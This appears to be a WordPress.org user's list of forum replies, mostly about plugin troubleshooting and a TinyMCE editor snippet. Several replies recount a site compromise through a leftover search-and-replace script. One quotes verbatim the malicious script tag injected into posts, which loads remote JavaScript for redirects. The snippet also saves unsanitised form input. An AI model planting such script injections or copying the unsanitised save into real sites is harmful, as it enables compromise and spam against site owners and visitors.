Title: appleaday's Replies | WordPress.org

---

# appleaday

  [  ](https://wordpress.org/support/users/appleaday/)

 *   [Profile](https://wordpress.org/support/users/appleaday/)
 *   [Topics Started](https://wordpress.org/support/users/appleaday/topics/)
 *   [Replies Created](https://wordpress.org/support/users/appleaday/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/appleaday/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/appleaday/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/appleaday/engagements/)
 *   [Favorites](https://wordpress.org/support/users/appleaday/favorites/)

 Search replies:

## Forum Replies Created

Viewing 11 replies - 1 through 11 (of 11 total)

 *   Forum: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/)
   
   In reply to: [Cannot I really modify a post on the forum?](https://wordpress.org/support/topic/cannot-i-really-modify-a-post-on-the-forum/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [4 years, 9 months ago](https://wordpress.org/support/topic/cannot-i-really-modify-a-post-on-the-forum/#post-14818272)
 * Many thanks, Steve!
    Many thanks, Jan!
 * Andrea
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Failed to use tinyMCE within a metabox](https://wordpress.org/support/topic/failed-to-use-tinymce-within-a-metabox/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [4 years, 9 months ago](https://wordpress.org/support/topic/failed-to-use-tinymce-within-a-metabox/#post-14818262)
 * Many thanks, Alan!
 * Andrea
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Failed to use tinyMCE within a metabox](https://wordpress.org/support/topic/failed-to-use-tinymce-within-a-metabox/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [4 years, 9 months ago](https://wordpress.org/support/topic/failed-to-use-tinymce-within-a-metabox/#post-14809524)
 * I did appreciate your hint, thanks!
 * Though I didn’t properly get the way you added the _edit\_form\_advanced_ action.
 * I eventually used something like what follows.
 *     ```
       add_action('edit_form_after_title', 'custom_tinymce_editor');
       function custom_tinymce_editor () {
   
          global $post;
          if ( 'my_custom_post_type' !== $post->post_type) {
           return;
          }
          $custom = get_post_custom( $post->id );
          $desc = $custom[ "_desc" ][ 0 ];
   
          $textarea_id = 'desc';
          echo '<p>something to display</p>';
          $wp_editor_settings = array(
                                       'tinymce' => true,
                                       'textarea_name' => '_desc',
                                       'quicktags' => false,
                                       'media_buttons' => true
          );
          wp_editor($desc, $textarea_id, $wp_editor_settings);
          echo '<p>still something to display</p>';
       }
       ```
   
 * This way I avoided having the TinyMCE code mixed with the code of a meta box (
   it could still work, but it gave me an unpleasant idea of disorder).
 * I’m still puzzled, though, because I’m still using a code that mentions _meta_…
 * `update_post_meta( $post->ID, "_desc", $_POST[ "_desc" ]);`
 * But _desc_ is no more handled by a meta box… should I mind that?
 * Thanks!
 * Andrea
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Flow-Flow Social Feed Stream] Error with Instagram feed](https://wordpress.org/support/topic/error-with-instagram-feed-2/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [5 years, 3 months ago](https://wordpress.org/support/topic/error-with-instagram-feed-2/#post-14203448)
 * An in-depth reading of the guidelines helped.
 * To people possibly facing the issued I described I suggest in particular _Instagram
   requirements_ and _Troubleshooting_ in the page at the URL I report below.
 * [https://docs.social-streams.com/article/46-authenticate-with-facebook](https://docs.social-streams.com/article/46-authenticate-with-facebook)
 * _If your feeds are showing the “(#100) Tried accessing nonexisting field (business\
   _discovery) on node type (Page)” error, please make sure that during the authentication
   process you connected the Facebook page with the Instagram account connected._
 * The sentence quoted above might be a sum-up.
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[SSL Insecure Content Fixer] Can I de-activate the plugin withouth disrupting the website?](https://wordpress.org/support/topic/can-i-de-activate-the-plugin-withouth-disrupting-the-website/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [6 years, 11 months ago](https://wordpress.org/support/topic/can-i-de-activate-the-plugin-withouth-disrupting-the-website/#post-11723874)
 * I apologize: I could eventually de-activate with no pain for the website after
   fixing the problem at the URL below (not related to this plugin anyway).
 * [https://wordpress.org/support/topic/href-values-disappear-from-main-menu-items-upon-requesting-home-page-via-https/](https://wordpress.org/support/topic/href-values-disappear-from-main-menu-items-upon-requesting-home-page-via-https/)
 * Andrea
    -  This reply was modified 6 years, 11 months ago by [appleaday](https://wordpress.org/support/users/appleaday/).
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[SSL Insecure Content Fixer] href values disappear from main menu items upon requesting home page via https](https://wordpress.org/support/topic/href-values-disappear-from-main-menu-items-upon-requesting-home-page-via-https/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [6 years, 11 months ago](https://wordpress.org/support/topic/href-values-disappear-from-main-menu-items-upon-requesting-home-page-via-https/#post-11723867)
 * I apologize: this plugin turned out to be completely innocent, the php code of
   the “Hero Nav” plugin was instead involved (I fixed it).
 * Andrea
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Feed Them Social - Social Media Feeds, Video, and Photo Galleries] Where can shorcodes work?](https://wordpress.org/support/topic/where-can-shorcodes-work/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [8 years, 1 month ago](https://wordpress.org/support/topic/where-can-shorcodes-work/#post-10257576)
 * You gave me a good prompt, Spencer. Following that track I got with a sort of
   visual editor I’m not familiar with (I didn’t personally choose the theme and
   its tools), that way I could add a WYSIWYG input box in the main content column,
   similar to input text seen for pages, there in “text mode” I added the shortcodes
   in the tailored HTML code and they could actually be interpreted.
 * Many thanks!!!
 * Andrea
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [What malicious actions can be made with a “search and replace” in a WP database?](https://wordpress.org/support/topic/what-malicious-actions-can-be-made-with-a-search-and-replace-in-a-wp-database/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/what-malicious-actions-can-be-made-with-a-search-and-replace-in-a-wp-database/#post-9414170)
 * [@rening1964](https://wordpress.org/support/users/rening1964/) I’m afraid I didn’t
   get what you mean. As far as I could see it was enough to use the script seachreplacedb2.
   php to inject some javascript code in posts (by simply using the script in the
   way it is normally used). I cannot see how the php file you mentioned could be
   involved.
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Wordfence Security - Firewall, Malware Scan, and Login Security] Forgot to remove searchreaplacedb2.php: what can I do now?](https://wordpress.org/support/topic/forgot-to-remove-searchreaplacedb2-php-what-can-i-do-now/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/forgot-to-remove-searchreaplacedb2-php-what-can-i-do-now/#post-9390478)
 * I’m afraid I didn’t get for sure the question, anyway I try to answer.
    I can
   tell for sure where the file is and where there isn’t, since I never thought 
   of giving it a completely unrelated name, except for the last time I used it,
   and I’m pretty sure I removed each copy of the script from any virtual host in
   use.
 * In the meantime I also gave a look at the other tables (“posts” involves articles
   and static pages, I saw..) but I couldn’t find any table where something could
   be profitably be inserted with a “search and replace” operation. For the moment
   I can assume the aim of the intrusion was just spamming pages and articles with
   redirections (the mentioned <script>). But I wonder what I paid Wordfence intervention
   could do in my stead.
 * Thanks!
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [What malicious actions can be made with a “search and replace” in a WP database?](https://wordpress.org/support/topic/what-malicious-actions-can-be-made-with-a-search-and-replace-in-a-wp-database/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/what-malicious-actions-can-be-made-with-a-search-and-replace-in-a-wp-database/#post-9364270)
 * I do appreciate your remark, thanks. That was enough for me to change the database
   user and password anyway, though actually that user **had no remote access**,
   and the new user has no remote access, as well.
 * That’s why, if I got your remark correctly, it’s worth questioning just about
   possible “searching and replacing” via the searchreplacedb2.php script. I wouldn’t
   throw away an entire installation just because I suspect something evil might
   still hide in the database, should I?
 * I assume such an attack is not an act of vandalism, i.e. with the aim of destroying
   or spoil the contents – with evident outstanding effects – but instead aims to
   achieve some profit – redirecting to some other page was what I saw – **without
   being noticed for the longest time possible**.
 * There’s no use to specify I’m not a security expert – if I was I wouldn’t confess
   such a mistake like the one I made – but I assumed a deeper knowledge of WP tables
   and their roles would help in “guessing” what kind of substitutions would be 
   useful for an attacker in tables other than “posts”. That’s the real target of
   my request for help.
 * It’s worth specifying the website is now apparently in good order, though of 
   course to feel completely safe I have to go further with investigations: how?
   😉
 * Thanks in advance!
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Wordfence Security - Firewall, Malware Scan, and Login Security] Forgot to remove searchreaplacedb2.php: what can I do now?](https://wordpress.org/support/topic/forgot-to-remove-searchreaplacedb2-php-what-can-i-do-now/)
 *  Thread Starter [appleaday](https://wordpress.org/support/users/appleaday/)
 * (@appleaday)
 * [8 years, 10 months ago](https://wordpress.org/support/topic/forgot-to-remove-searchreaplacedb2-php-what-can-i-do-now/#post-9363429)
 * UPDATE: I found several additions in the bodies of the posts, like the one below,
   coming before an anchor tag.
 * <script src=’[https://traffictrade.life/scripts.js&#8217](https://traffictrade.life/scripts.js&#8217);
   type=’text/javascript’></script>
 * I used the same searchreplacedb2.php with the name changed to purge the tables
   from that rubbish and eventually delete that copy. Now I wonder what else I should
   check. Possibly any <script>…</script> in the bodies fo the posts?
    What else?
 * Thanks in advance!

Viewing 11 replies - 1 through 11 (of 11 total)